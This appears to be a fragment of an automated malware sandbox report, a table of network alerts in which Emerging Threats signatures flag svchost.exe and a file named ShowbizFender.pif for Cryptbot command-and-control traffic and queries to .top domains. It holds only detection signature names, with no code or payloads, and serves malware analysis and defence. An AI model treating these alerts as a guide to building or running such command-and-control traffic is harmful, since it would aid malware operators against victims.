whitelisted

Threats

PID

Process

Class

Message

2256

svchost.exe

Potentially Bad Traffic

ET DNS Query to a *.top domain - Likely Hostile

2256

svchost.exe

A Network Trojan was detected

ET MALWARE Cryptbot CnC DGA Domain (eight8)

7108

ShowbizFender.pif

Potentially Bad Traffic

ET INFO HTTP Request to a *.top domain

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

No debug info
